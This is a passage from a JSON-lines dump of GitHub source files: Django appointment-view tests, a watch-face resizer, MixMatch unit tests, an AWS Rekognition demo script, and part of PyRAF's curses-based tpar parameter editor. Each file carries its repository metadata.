test_update_appointment_view(self):\n apt = models.Appointment.objects.first()\n\n # Getting to appointment update view\n response = self.client.get(reverse(\"appointment-update\",\n kwargs={'pk': apt.pk}))\n self.assertEqual(response.status_code, 200)\n\n # Posting updated appointment\n self.assertEqual(apt.comment, 'test this stuff')\n response = self.client.post(reverse('appointment-update',\n kwargs={'pk': apt.pk}), data=apt_dict())\n self.assertEqual(response.status_code, 302)\n self.assertRedirects(response, reverse('appointment-list'))\n \n apt_test = models.Appointment.objects.filter(id=apt.pk).first()\n self.assertEqual(apt_test.comment, 'stuff')\n\n def test_new_appointment_with_patient_name(self):\n #Get new appointment view\n url = \"%s?pt_id=%s\" % (reverse(\"appointment-new\"),\n Patient.objects.filter(pk=1).first().pk)\n response = self.client.get(url)\n self.assertEqual(response.context['form'].initial['patient'],\n Patient.objects.filter(pk=1).first())\n\n def test_new_appointment_with_date(self):\n response = self.client.get(\"%s?date=%s\" %\n (reverse(\"appointment-new\"), now().date()))\n self.assertEqual(response.context['form'].initial['clindate'],\n now().date().strftime(\"%Y-%m-%d\"))\n\n def test_mark_noshow(self):\n self.assertEqual(self.apt.pt_showed, None)\n self.assertEqual(models.Appointment.objects.count(), 1)\n\n response = self.client.get(reverse(\"appointment-mark-no-show\",\n args=(self.apt.pk,)))\n\n self.assertRedirects(response, reverse('appointment-list'))\n\n self.assertEqual(models.Appointment.objects.count(), 1)\n self.assertEqual(models.Appointment.objects.first().pt_showed, False)\n\n response = self.client.get('appointment-list')\n # one 'mark as noshow' link should be gone now\n noshow_links = re.findall(\n re.escape('href=\"/appointment/') +\n r'[0-9]+' +\n re.escape('/noshow'),\n response.content.decode('utf-8'))\n self.assertEqual(len(noshow_links), 0)\n\n def test_mark_arrived(self):\n assert self.apt.pt_showed is None\n assert models.Appointment.objects.count() == 1\n\n response = self.client.get(reverse(\"appointment-mark-arrived\",\n args=(self.apt.pk,)))\n self.assertRedirects(\n response,\n reverse(\"core:patient-update\", args=(self.apt.patient.pk,))\n )\n\n assert models.Appointment.objects.count() == 1\n assert models.Appointment.objects.first().pt_showed is True\n\n response = self.client.get('appointment-list')\n # one 'mark as arrived' link should be gone now\n arrived_links = re.findall(\n re.escape('href=\"/appointment/') +\n r'[0-9]+' +\n re.escape('/arrived'),\n response.content.decode('utf-8'))\n\n assert len(arrived_links) == 0\n\n def test_first_apt_is_today(self):\n\n apts = []\n for datedelta in [-1, 1]:\n date = now().date() - timedelta(days=datedelta)\n\n apts.append(models.Appointment.objects.create(\n comment='test this stuff',\n clindate=date,\n clintime=time(9, 0),\n appointment_type='PSYCH_NIGHT',\n author=self.user,\n author_type=self.user.groups.first(),\n patient=Patient.objects.first()))\n\n # three appointments should exist, total\n self.assertEqual(models.Appointment.objects.count(), 3)\n\n response = self.client.get(reverse(\"appointment-list\"), follow=True)\n self.assertTemplateUsed('appointment/appointment_list.html')\n\n # only two panels should appear, since one apt is in the past and\n # two fall on the same day (today)\n for i in range(2):\n self.assertContains(\n response, 'appointment-panel-%s' % i)\n self.assertContains(\n response, 'appointment-table-%s' % i)\n\n # only one new appointment link should appear, since the \"today\"\n # panel shouldn't get one\n new_appointment_links = re.findall(\n re.escape('href=\"/appointment/new?date=') +\n r'[0-9]{4}-[0-9]{2}-[0-9]{2}',\n response.content.decode('utf-8'))\n\n self.assertEqual(len(new_appointment_links), 1)\n\n # one 'mark as noshow' link should appear, since the the today\n # panel has two pts\n noshow_links = re.findall(\n re.escape('href=\"/appointment/') +\n r'[0-9]+' +\n re.escape('/noshow'),\n response.content.decode('utf-8'))\n\n self.assertEqual(len(noshow_links), 1)\n\n # one 'mark as here' link should appear, since the the today\n # panel has two pts\n arrived_links = re.findall(\n re.escape('href=\"/appointment/') +\n r'[0-9]+' +\n re.escape('/arrived'),\n response.content.decode('utf-8'))\n\n self.assertEqual(len(arrived_links), 1)\n","repo_name":"llemr-conspiracy/llemr","sub_path":"osler/appointment/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"47"} +{"seq_id":"42765629154","text":"\n\n#!/usr/bin/python\n\nfrom resizer import Resizer\n\n\n\n# gts2mini: 306 x 354\n# bipU: 302 x 320\n# bip3: 240 x 280\n\nscaleGTS2toBIP3 = (240 / 348, 280 / 442)\n\noutputDirName = 'bip3'\n\nresizer = Resizer(outputDirName, scaleGTS2toBIP3)\nresizer.process()\n \n\n\n\n","repo_name":"Tnxec2/amazfit-gts2mini-bip-resizer","sub_path":"gts2ToBip3.py","file_name":"gts2ToBip3.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32928654240","text":"import torch\nimport sys\nsys.path.append(\"..\")\n\nimport mixmatch as mixmatch\nimport losses as losses\n\ndef test_shape_of_avg_predictions():\n \"\"\"Test snippet of mixmatch averaging labels for classifications\"\"\"\n # Define input values\n aug_predictions = torch.zeros((6, 4, 5)) # N*K,C,..\n N = 3\n K = 2\n\n # Calculate avg_prediction\n avg_prediction = aug_predictions.reshape(N, K, *aug_predictions.shape[1:]).mean(dim=1, keepdim=True)\n\n # Verify shape of avg_prediction\n assert avg_prediction.shape == torch.Size([N, 1, *aug_predictions.shape[1:]])\n\n # Calculate avg_predictions\n avg_predictions = avg_prediction.repeat(1,K,*([1] * (aug_predictions.ndim-1))).reshape(N*K,*aug_predictions.shape[1:])\n\n # Verify shape of avg_predictions\n assert avg_predictions.shape == torch.Size([N*K, *aug_predictions.shape[1:]])\n\n avg_prediction = mixmatch.average_labels(aug_predictions.reshape(N,K, *aug_predictions.shape[1:]))\n print(avg_predictions.shape)\n\ndef test_sharpen():\n # Create example input tensor of shape [N, C, H, W]\n p = torch.nn.functional.softmax(torch.rand((2, 4)),dim=1)\n\n # Sharpen the tensor along the C dimension\n T = 0.3\n dim = 1\n p_sharp = mixmatch.sharpen(p, T, dim)\n\n assert p.shape == p_sharp.shape\n \n # Print shapes of input and output tensors\n # print(p)\n # print(p_sharp)\n\ndef test_mixup():\n # Create some fake data and labels\n data1 = torch.randn(10, 3, 32, 32)\n labels1 = torch.randn(10, 10)\n data2 = torch.randn(10, 3, 32, 32)\n labels2 = torch.randn(10, 10)\n\n # Create input tuples\n input_tuple1 = (data1, labels1)\n input_tuple2 = (data2, labels2)\n\n # Mix up the data and labels\n mixed_data, mixed_labels, lam = mixmatch.mixup(input_tuple1, input_tuple2)\n\n assert mixed_data.shape == data1.shape\n assert mixed_labels.shape == labels1.shape\n assert lam.shape == data1.shape[0:1]\n\n # print(\"Mixed-up data shape:\", mixed_data.shape)\n # print(\"Mixed-up labels shape:\", mixed_labels.shape)\n # print(\"Mixing coefficients shape:\", lam.shape)\n \n\ndef test_kl_divergence():\n \n # Define input and target tensors\n input_tensor = torch.tensor([[1.0, 2.0, 3.0], [2.0, 3.0, 1.0]])\n target_tensor = torch.tensor([[0.3, 0.3, 0.4], [0.2, 0.5, 0.3]])\n\n # Compute KL divergence with default reduction\n kl_div = losses.kl_divergence(input_tensor, target_tensor)\n\n # Check that output is a scalar\n \n assert isinstance(kl_div, torch.Tensor)\n assert kl_div.shape == torch.Size([])\n\n # Compute KL divergence with reduction='none'\n kl_div_none = losses.kl_divergence(input_tensor, target_tensor, reduction='none')\n\n # Check that output is a tensor with the same shape as the input\n assert isinstance(kl_div_none, torch.Tensor)\n assert kl_div_none.shape == input_tensor.shape\n\n # Check if two same predictions are equal\n input_tensor = torch.tensor([[0, 1e10, 0], [1e10, 0, 0]])\n target_tensor = torch.tensor([[0., 1., 0.], [1., 0., 0.]])\n eps = 1e-3\n\n kl_div = losses.kl_divergence(input_tensor,target_tensor)\n assert kl_div < eps # kl_div always hiher then 0\n\n \n\nif __name__ == \"__main__\":\n #test_shape_of_avg_predictions()\n #test_sharpen()\n #test_mixup()\n test_kl_divergence()\n\n\n\n\n","repo_name":"hruskan1/SSL-diploma-thesis","sub_path":"src/mixmatch/tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"33621192194","text":"import json\nimport boto3\nimport matplotlib.pyplot as plt\nimport cv2\n\nimport os\nos.system('cls')\n\n\nclient = boto3.client(\n 'rekognition',\n aws_access_key_id='aws_access_key_id',\n aws_secret_access_key='aws_secret_access_key',\n region_name='ap-southeast-1'\n)\n\nphoto = \"img/label.jpg\"\nimg = cv2.imread(photo)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\nwith open(photo, 'rb') as source_image:\n source_bytes = source_image.read()\n\nresponse = client.detect_labels(\n Image={'Bytes': source_bytes},\n MaxLabels=1,\n MinConfidence=99\n)\n\nprint(response)\nplt.subplot(1, 2, 1), plt.imshow(img)\nplt.title('Input'), plt.xticks([]), plt.yticks([])\nplt.subplot(1, 2, 2), plt.imshow(img)\nplt.title('Output'), plt.xticks([]), plt.yticks([])\nplt.show()","repo_name":"mzuhriwijianto/Praktikum-pengolahan-citra","sub_path":"P10/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19003245156","text":"\"\"\"module 'tpar.py' -- main module for generating the tpar task editor\n\ntpar is curses based parameter editing similar to epar. Tpar has the\nprimary goal of simplicity similar to IRAF's CL epar and as such is\nmissing many PyRAF epar features. The primary advantage of tpar is\nthat it works in a simple terminal window (rather than requiring full\nX-11 and Tk); this is an improvement for low bandwidth network\ncontexts or for people who prefer text interfaces to GUIs.\n\nTodd Miller, 2006 May 30 derived from epar.py and IRAF CL epar.\n\"\"\"\n\n\n# XXXX Debugging tip: uncomment self.inform() in the debug() method below\n\nimport os\nimport sys\nimport re\n\n\n# Fake out import of urwid if it fails, to keep tpar from bringing down\n# all of PyRAF.\nclass FakeModule:\n pass\n\nclass FakeClass:\n pass\n\n\ntry:\n import urwid.curses_display\n import urwid.raw_display\n import urwid\n from . import urwutil\n from . import urwfiledlg\n urwid.set_encoding(\"ascii\") # gives better performance than 'utf8'\nexcept ImportException as e:\n urwid = FakeModule()\n urwid.Edit = FakeClass()\n urwid.Columns = FakeClass()\n urwid.AttrWrap = FakeClass()\n urwid.Pile = FakeClass()\n urwid.the_error = str(e)\n\n# PyRAF modules\nfrom . import iraf\nfrom . import irafpar\nfrom . import irafhelp\nfrom . import iraftask\nfrom . import iraffunctions\n\nTPAR_HELP_EMACS = \"\"\" EDIT COMMANDS (emacs)\n\n DEL_CHAR = DEL MOVE_RIGHT = RIGHT_ARROW\n DEL_LEFT = ^H_or_BS MOVE_RIGHT = ^F\n DEL_LINE = ^K MOVE_START = ESC-<\n DEL_WORD = ESC-D MOVE_UP = UP_ARROW\n DEL_WORD = ESC-d MOVE_UP = ^P\n EXIT_NOUPD = ^C NEXT_PAGE = ^V\n EXIT_UPDAT = ^D NEXT_WORD = ESC-F\n NEXT_WORD = ESC-f\n GET_HELP = ESC-? PREV_PAGE = ESC-V\n MOVE_BOL = ^A PREV_PAGE = ESC-v\n MOVE_DOWN = DOWN_ARROW PREV_WORD = ESC-B\n MOVE_DOWN = ^N PREV_WORD = ESC-b\n MOVE_END = ESC-> REPAINT = ^L\n MOVE_EOL = ^E UNDEL_CHAR = ESC-^D\n MOVE_LEFT = LEFT_ARROW UNDEL_LINE = ESC-^K\n MOVE_LEFT = ^B UNDEL_WORD = ESC-^W\n\n X-11 Paste: hold down shift and click middle mouse button\n\n :e[!] [pset] edit pset \"!\" == no update\n :q[!] exit tpar \"!\" == no update\n :r! unlearn\n :w[!] [pset] unsupported\n :g[!] run task\n\"\"\"\n\nTPAR_BINDINGS_EMACS = {\n \"ctrl c\": \"quit\",\n \"ctrl C\": \"quit\",\n \"ctrl d\": \"exit\",\n \"ctrl D\": \"exit\",\n \"ctrl z\": \"exit\",\n \"ctrl Z\": \"exit\",\n \"ctrl p\": \"up\",\n \"ctrl P\": \"up\",\n \"shift tab\": \"up\",\n \"ctrl n\": \"down\",\n \"ctrl N\": \"down\",\n \"esc v\": \"page down\",\n \"esc V\": \"page down\",\n \"esc p\": \"page up\",\n \"esc P\": \"page up\",\n\n # \"ctrl l\" : \"redraw\", # re-draw... just ignore\n # \"ctrl L\" : \"redraw\",\n \"ctrl K\": \"del_line\",\n \"ctrl k\": \"del_line\",\n \"esc d\": \"del_word\",\n \"esc D\": \"del_word\",\n \"esc f\": \"next_word\",\n \"esc F\": \"next_word\",\n \"esc b\": \"prev_word\",\n \"esc B\": \"prev_word\",\n \"ctrl a\": \"move_bol\",\n \"ctrl A\": \"move_bol\",\n \"ctrl e\": \"move_eol\",\n \"ctrl E\": \"move_eol\",\n \"esc >\": \"end\",\n \"esc <\": \"home\",\n \"ctrl f\": \"right\",\n \"ctrl F\": \"right\",\n \"ctrl b\": \"left\",\n \"ctrl B\": \"left\",\n \"esc ctrl d\": \"undel_char\",\n \"esc ctrl k\": \"undel_line\",\n \"ctrl y\": \"undel_line\",\n \"esc ctrl w\": \"undel_word\",\n \"esc ?\": \"help\"\n}\n\nTPAR_HELP_VI = \"\"\" EDIT COMMANDS (vi)\n\n DEL_CHAR = BACKSPACE MOVE_LEFT = ^H\n DEL_LEFT = DEL MOVE_RIGHT = RIGHT_ARROW\n DEL_LINE = ^I^D MOVE_RIGHT = ^L\n DEL_WORD = ^I^W MOVE_START = ^T^S\n EXIT_NOUPD = ^C MOVE_UP = UP_ARROW\n EXIT_UPDAT = ^D MOVE_UP = ^K\n EXIT_UPDAT = ^Z NEXT_PAGE = ^N\n GET_HELP = ESC-? NEXT_WORD = ^W\n MOVE_BOL = ^A PREV_PAGE = ^P\n MOVE_DOWN = DOWN_ARROW PREV_WORD = ^B\n MOVE_DOWN = ^J REPAINT = ^R\n MOVE_END = ^T^E UNDEL_CHAR = ^U^C\n MOVE_EOL = ^E UNDEL_LINE = ^U^L\n MOVE_LEFT = LEFT_ARROW UNDEL_WORD = ^U^W\n\n X-11 Paste: hold down shift and click middle mouse button\n\n :e[!] [pset] edit pset \"!\" == no update\n :q[!] exit tpar \"!\" == no update\n :r! unlearn\n :w[!] [pset] unsupported\n :g[!] run task\n\"\"\"\n\nTPAR_BINDINGS_VI = {\n \"ctrl c\": \"quit\",\n \"ctrl d\": \"exit\",\n \"ctrl C\": \"quit\",\n \"ctrl D\": \"exit\",\n \"ctrl K\": \"up\",\n \"ctrl k\": \"up\",\n \"ctrl j\": \"down\",\n \"ctrl J\": \"down\",\n \"ctrl n\": \"page down\",\n \"ctrl N\": \"page down\",\n \"ctrl p\": \"page up\",\n \"ctrl P\": \"page up\",\n\n # \"ctrl r\" : \"redraw\", # re-draw... just ignore\n # \"ctrl R\" : \"redraw\",\n \"tab ctrl D\": \"del_line\",\n \"tab ctrl d\": \"del_line\",\n \"tab ctrl W\": \"del_word\",\n \"tab ctrl w\": \"del_word\",\n \"ctrl w\": \"next_word\",\n \"ctrl W\": \"next_word\",\n \"ctrl b\": \"prev_word\",\n \"ctrl B\": \"prev_word\",\n \"ctrl a\": \"move_bol\",\n \"ctrl A\": \"move_bol\",\n \"ctrl e\": \"move_eol\",\n \"ctrl E\": \"move_eol\",\n \"ctrl T ctrl E\": \"end\",\n \"ctrl t ctrl e\": \"end\",\n \"ctrl T ctrl S\": \"home\",\n \"ctrl t ctrl s\": \"home\",\n \"ctrl L\": \"right\",\n \"ctrl l\": \"right\",\n \"ctrl H\": \"left\",\n \"ctrl h\": \"left\",\n \"ctrl U ctrl C\": \"undel_char\",\n \"ctrl u ctrl c\": \"undel_char\",\n \"ctrl U ctrl L\": \"undel_line\",\n \"ctrl u ctrl l\": \"undel_line\",\n \"ctrl U ctrl W\": \"undel_word\",\n \"ctrl u ctrl w\": \"undel_word\",\n \"esc ?\": \"help\"\n}\n\n\nclass Binder:\n \"\"\"The Binder class manages keypresses for urwid and adds the\n ability to bind specific inputs to actions.\n \"\"\"\n\n def __init__(self, bindings, inform, mode_keys=[]):\n self.bindings = bindings\n self.inform = inform\n self.mode_keys = mode_keys\n self.chord = []\n\n def bind(self, k, f):\n self.bindings[k] = f\n\n def keypress(self, pos, key):\n if key is None:\n return\n # Handle the \"ready\" binding specially to keep the rest simple.\n if key == \"ready\":\n if \"ready\" in self.bindings:\n return self.bindings[\"ready\"]()\n else:\n return \"ready\"\n self.debug(f\"pos: {pos} key: {key}\")\n if key in self.mode_keys:\n self.chord.append(key)\n return None\n elif not urwid.is_mouse_event(key):\n key = \" \".join(self.chord + [key])\n self.chord = []\n visited = []\n while key in self.bindings and key not in visited:\n visited.append(key)\n f = self.bindings[key]\n if f is None:\n key = None\n elif isinstance(f, str): # str & unicode?\n key = f\n else:\n key = f()\n self.debug(f\"pos: {pos} visited: {' --> '.join(visited)} \"\n f\"key: {key} mapping: {f}\")\n return key\n\n def debug(self, s):\n # return self.inform(s)\n return None\n\n\nclass PyrafEdit(urwid.Edit):\n \"\"\"PyrafEdit is a text entry widget which has keybindings similar\n to IRAF's CL epar command.\n \"\"\"\n\n def __init__(self, *args, **keys):\n inform = keys[\"inform\"]\n del keys[\"inform\"]\n self.reset_del_buffers()\n urwid.Edit.__init__(self, *args, **keys)\n EDIT_BINDINGS = { # single field bindings\n \"delete\": self.DEL_CHAR,\n \"del_line\": self.DEL_LINE,\n \"del_word\": self.DEL_WORD,\n\n \"undel_char\": self.UNDEL_CHAR,\n \"undel_word\": self.UNDEL_WORD,\n \"undel_line\": self.UNDEL_LINE,\n\n \"next_word\": self.NEXT_WORD,\n \"prev_word\": self.PREV_WORD,\n\n \"move_bol\": self.MOVE_BOL,\n \"move_eol\": self.MOVE_EOL,\n\n \"right\": self.MOVE_RIGHT,\n \"left\": self.MOVE_LEFT,\n }\n self._binder = Binder(EDIT_BINDINGS, inform)\n\n def reset_del_buffers(self):\n self._del_words = []\n self._del_lines = []\n self._del_chars = []\n\n def DEL_CHAR(self):\n s = self.get_edit_text()\n if len(s):\n n = self.edit_pos\n if n >= len(s):\n n -= 1\n c = s[n]\n self.set_edit_text(s[:n] + s[n + 1:])\n self._del_chars.append(c)\n\n def DEL_WORD(self):\n s = self.get_edit_text()\n i = self.edit_pos\n while i > 0 and not s[i].isspace():\n i -= 1\n if s[i].isspace():\n i += 1\n word = \"\"\n while i < len(s) and not s[i].isspace():\n word += s[i]\n i += 1\n s = s[:i - len(word)] + s[i:]\n self._del_words.append(word)\n self.edit_pos = i\n self.set_edit_text(s)\n\n def DEL_LINE(self):\n s = self.get_edit_text()\n line = s[self.edit_pos:]\n self.set_edit_text(s[:self.edit_pos])\n self.set_edit_pos(len(self.get_edit_text()))\n self._del_lines.append(line)\n\n def NEXT_WORD(self):\n s = self.get_edit_text()\n i = self.edit_pos\n while s and i < len(s) - 1 and not s[i].isspace():\n i += 1\n while s and i < len(s) - 1 and s[i].isspace():\n i += 1\n self.edit_pos = i\n\n def PREV_WORD(self):\n s = self.get_edit_text()\n i = self.edit_pos\n while s and i > 0 and s[i].isspace():\n i -= 1\n while s and i > 0 and not s[i].isspace():\n i -= 1\n self.edit_pos = i\n\n def MOVE_BOL(self):\n self.edit_pos = 0\n\n def MOVE_EOL(self):\n self.edit_pos = len(self.get_edit_text())\n\n def MOVE_RIGHT(self):\n if self.edit_pos < len(self.get_edit_text()):\n self.edit_pos += 1\n\n def MOVE_LEFT(self):\n if self.edit_pos > 0:\n self.edit_pos -= 1\n\n def UNDEL_CHAR(self):\n try:\n char = self._del_chars.pop()\n except:\n return\n self.insert_text(char)\n self.edit_pos -= 1\n\n def UNDEL_WORD(self):\n try:\n word = self._del_words.pop()\n except:\n return\n self.insert_text(word)\n\n def UNDEL_LINE(self):\n try:\n if len(self._del_lines) > 1:\n line = self._del_lines.pop()\n else:\n line = self._del_lines[0]\n except:\n return\n self.insert_text(line)\n\n def keypress(self, pos, key):\n key = Binder.keypress(self._binder, pos, key)\n if key is not None and not urwid.is_mouse_event(key):\n key = urwid.Edit.keypress(self, pos, key)\n return key\n\n def get_result(self):\n return self.get_edit_text().strip()\n\n def verify(self):\n return True\n\n\nclass StringTparOption(urwid.Columns):\n\n def __init__(self, paramInfo, defaultParamInfo, inform):\n\n MODE_KEYS = []\n\n BINDINGS = {\n \"enter\": self.ENTER,\n \"up\": self.MOVE_UP,\n \"down\": self.MOVE_DOWN,\n \"page up\": self.PAGE_UP,\n \"page down\": self.PAGE_DOWN,\n \"undel_line\": self.UNDEL_LINE,\n \"ready\": self.READY_LINE,\n \"end\": self.MOVE_END,\n \"home\": self.MOVE_START\n }\n\n self._binder = Binder(BINDINGS, inform, MODE_KEYS)\n\n self._mode = \"clear\"\n self._newline = True\n self.inform = inform\n self.paramInfo = paramInfo\n self.defaultParamInfo = defaultParamInfo\n\n name = self.paramInfo.name\n value = self.paramInfo.get(field=\"p_filename\", native=0, prompt=0)\n self._previousValue = value\n\n # Generate the input label\n if (self.paramInfo.get(field=\"p_mode\") == \"h\"):\n required = False\n else:\n required = True\n\n help = self.paramInfo.get(field=\"p_prompt\", native=0, prompt=0)\n self._args = (name, value, help, required)\n if not required:\n name = \"(\" + name\n help = \") \" + help\n else:\n help = \" \" + help\n self._name = urwid.Text(f\"{name:<10s}=\")\n self._edit = PyrafEdit(\"\",\n \"\",\n wrap=\"clip\",\n align=\"right\",\n inform=inform)\n self._edit.verify = self.verify\n self._value = urwid.Text(f\"{value:10s}\", align=\"right\")\n self._help = urwid.Text(f\"{help:<30s}\")\n urwid.Columns.__init__(self, [('weight', 0.20, self._name),\n ('weight', 0.20, self._edit),\n ('weight', 0.20, self._value),\n ('weight', 0.40, self._help)], 0, 1, 1)\n\n def keypress(self, pos, key):\n key = Binder.keypress(self._binder, pos, key)\n if key:\n key = self._edit.keypress(pos, key)\n return key\n\n def get_name(self):\n return self._args[0]\n\n def get_candidate(self):\n return self._edit.get_edit_text()\n\n def set_candidate(self, s):\n self._edit.set_edit_text(s)\n self._edit.edit_pos = len(s)\n\n def normalize(self, v):\n \"\"\"abstract method called to standardize equivalent values\n when the 'result' is set.\"\"\"\n return v\n\n def get_result(self):\n return self._value.get_text()[0].strip()\n\n def set_result(self, r):\n self._value.set_text(self.normalize(str(r)))\n\n def unlearn_value(self):\n self.set_result(self._previousValue)\n\n def verify(self, v):\n self.inform(\"\")\n return True\n\n def UNDEL_LINE(\n self\n ): # a little iffy. handle first copy from value field to edit field here. defer subsequent calls.\n v = self.get_result()\n if v:\n self.set_candidate(self.get_candidate() + v)\n self.set_result(\"\")\n else:\n return \"undel_line\"\n\n def ENTER(self):\n return self.linechange(\"down\")\n\n def MOVE_UP(self):\n return self.linechange(\"up\")\n\n def MOVE_DOWN(self):\n return self.linechange(\"down\")\n\n def PAGE_UP(self):\n return self.linechange(\"page up\")\n\n def PAGE_DOWN(self):\n return self.linechange(\"page down\")\n\n def MOVE_START(self):\n return self.linechange(\"home\")\n\n def MOVE_END(self):\n return self.linechange(\"end\")\n\n def linechange(self, rval):\n \"\"\"Updates this field when changing the field focus,\n i.e. switching lines.\"\"\"\n s = self.get_candidate()\n if s != \"\":\n if self.verify(s):\n self.set_result(s)\n self.set_candidate(\"\")\n else:\n return None\n else: # clear old error messages\n self.inform(\"\")\n self._edit.set_edit_pos(0)\n self._edit.reset_del_buffers()\n self._newline = True\n return rval\n\n def READY_LINE(self):\n \"\"\"Prepares this field for editing in the current\n mode: default clear or default edit.\"\"\"\n if not self._newline:\n return\n self._newline = False\n if self._mode == \"clear\":\n self.set_candidate(\"\")\n else:\n s = self.get_result()\n self.set_candidate(s)\n self._edit.set_edit_pos(len(s))\n\n def klass(self):\n return \"string\"\n\n\nclass NumberTparOption(StringTparOption):\n\n def normalize(self, v):\n if v in [\"INDEF\", \"Indef\", \"indef\"]:\n return \"INDEF\"\n else:\n return v\n\n def verify(self, v):\n try:\n if v != self._previousValue:\n self.paramInfo.set(v)\n self.paramInfo.set(self._previousValue)\n return True\n except ValueError as e:\n self.set_candidate(\"\")\n self.inform(str(e))\n return False\n\n def klass(self):\n return \"number\"\n\n\nclass BooleanTparOption(StringTparOption):\n\n def __init__(self, *args, **keys):\n StringTparOption.__init__(self, *args, **keys)\n self._binder.bind(\" \", \"space\")\n self._binder.bind(\"space\", self.TOGGLE)\n self._binder.bind(\"right\", self.TOGGLE)\n self._binder.bind(\"left\", self.TOGGLE)\n\n def TOGGLE(self):\n if self.get_result() == \"yes\":\n self.set_result(\"no\")\n else:\n self.set_result(\"yes\")\n\n def normalize(self, v):\n if v in [\"n\", \"N\"]:\n return \"no\"\n elif v in [\"y\", \"Y\"]:\n return \"yes\"\n else:\n return v\n\n def verify(self, v):\n v = self.normalize(v)\n if v in [\"yes\", \"no\"]:\n self.inform(\"\")\n return True\n else:\n self.set_candidate(\"\")\n self.inform(\"Not a valid boolean value.\")\n return False\n\n def klass(self):\n return \"boolean\"\n\n\nclass EnumTparOption(StringTparOption):\n\n def __init__(self, *args, **keys):\n StringTparOption.__init__(self, *args, **keys)\n self._binder.bind(\" \", \"space\")\n self._binder.bind(\"space\", self.SPACE)\n self._binder.bind(\"right\", self.SPACE)\n self._binder.bind(\"left\", self.LEFT)\n\n def adjust(self, delta, wrap):\n choices = self.paramInfo.choice\n try:\n v = choices[choices.index(self.get_result()) + delta]\n except IndexError:\n v = choices[wrap]\n self.set_result(v)\n\n def SPACE(self):\n return self.adjust(1, 0)\n\n def LEFT(self):\n return self.adjust(-1, -1)\n\n def klass(self):\n return \"enumeration\"\n\n def verify(self, v):\n if v not in self.paramInfo.choice:\n self.inform(\"What? choose: \" + \"|\".join(self.paramInfo.choice))\n self.set_candidate(\"\")\n return False\n return True\n\n\nclass PsetTparOption(StringTparOption):\n\n def klass(self):\n return \"pset\"\n\n\nclass TparHeader(urwid.Pile):\n banner = \"\"\" I R A F\n Image Reduction and Analysis Facility\n\"\"\"\n\n def __init__(self, package, task=None):\n top = urwid.Text((\"header\", self.banner))\n s = f\"{'PACKAGE':>8}= {package:<10}\\n\"\n if task is not None:\n s += f\"{'TASK':>8}= {task:<10}\"\n info = urwid.Text((\"body\", s))\n urwid.Pile.__init__(self, [top, info])\n\n\nclass TparDisplay(Binder):\n palette = [\n ('body', 'default', 'default', 'standout'),\n ('header', 'default', 'default', ('standout', 'underline')),\n ('help', 'black', 'light gray'),\n ('reverse', 'light gray', 'black'),\n ('important', 'dark blue', 'light gray', ('standout', 'underline')),\n ('editfc', 'white', 'dark blue', 'bold'),\n ('editbx', 'light gray', 'dark blue'),\n ('editcp', 'black', 'light gray', 'standout'),\n ('bright', 'dark gray', 'light gray', ('bold', 'standout')),\n ('buttn', 'black', 'dark cyan'),\n ('buttnf', 'white', 'dark blue', 'bold'),\n ]\n\n def __init__(self, taskName):\n\n MODE_KEYS_EMACS = [\"esc\"]\n\n MODE_KEYS_VI = [\"esc\", \"tab\", \"ctrl u\", \"ctrl U\", \"ctrl t\", \"ctrl T\"]\n\n TPAR_BINDINGS = { # Page level bindings\n \"quit\": self.QUIT,\n \"exit \": self.EXIT,\n \"help\": self.HELP,\n \"end\": self.MOVE_END,\n \"home\": self.MOVE_START,\n }\n\n # Get the Iraftask object\n if isinstance(taskName, irafpar.IrafParList):\n # IrafParList acts as an IrafTask for our purposes\n self.taskObject = taskName\n else:\n # taskName must be a string or an IrafTask object\n self.taskObject = iraf.getTask(taskName)\n\n # Now go back and ensure we have the full taskname\n self.taskName = self.taskObject.getName()\n self.pkgName = self.taskObject.getPkgname()\n self.paramList = self.taskObject.getParList(docopy=1)\n\n # See if there exist any special versions on disk to load\n self.__areAnyToLoad = irafpar.haveSpecialVersions(\n self.taskName, self.pkgName) # irafpar caches them\n\n # Ignore the last parameter which is $nargs\n self.numParams = len(self.paramList) - 1\n\n # Get default parameter values for unlearn\n self.get_default_param_list()\n self.make_entries()\n\n self.escape = False\n\n self._createButtons()\n\n self.colon_edit = PyrafEdit(\"\",\n \"\",\n wrap=\"clip\",\n align=\"left\",\n inform=self.inform)\n self.listitems = [urwid.Divider(\" \")] + self.entryNo + \\\n [urwid.Divider(\" \"), self.colon_edit,\n self.buttons]\n self.listbox = urwid.ListBox(self.listitems)\n\n self.listbox.set_focus(1)\n self.footer = urwid.Text(\"\")\n self.header = TparHeader(self.pkgName, self.taskName)\n\n self.view = urwid.Frame(self.listbox,\n header=self.header,\n footer=self.footer)\n\n self._editor = iraf.envget(\"editor\")\n BINDINGS = {}\n BINDINGS.update(TPAR_BINDINGS)\n if self._editor == \"vi\":\n BINDINGS.update(TPAR_BINDINGS_VI)\n MODE_KEYS = MODE_KEYS_VI\n else:\n BINDINGS.update(TPAR_BINDINGS_EMACS)\n MODE_KEYS = MODE_KEYS_EMACS\n Binder.__init__(self, BINDINGS, self.inform, MODE_KEYS)\n\n def _createButtons(self):\n \"\"\" Set up all the bottom row buttons and their spacings \"\"\"\n\n isPset = isinstance(self.taskObject, iraftask.IrafPset)\n\n self.help_button = urwid.Padding(urwid.Button(\"Help\", self.HELP),\n align=\"center\",\n width=8,\n right=4,\n left=5)\n self.cancel_button = urwid.Padding(urwid.Button(\"Cancel\", self.QUIT),\n align=\"center\",\n width=10)\n if not isPset:\n self.save_as_button = urwid.Padding(urwid.Button(\n \"Save As\", self.SAVEAS),\n align=\"center\",\n width=11)\n self.save_button = urwid.Padding(urwid.Button(\"Save\", self.EXIT),\n align=\"center\",\n width=8)\n self.exec_button = urwid.Padding(urwid.Button(\"Exec\", self.go),\n align=\"center\",\n width=8)\n if self.__areAnyToLoad:\n self.open_button = urwid.Padding(urwid.Button(\"Open\", self.PFOPEN),\n align=\"center\",\n width=8)\n\n # GUI button layout - weightings\n if isPset: # show no Open nor Save As buttons\n 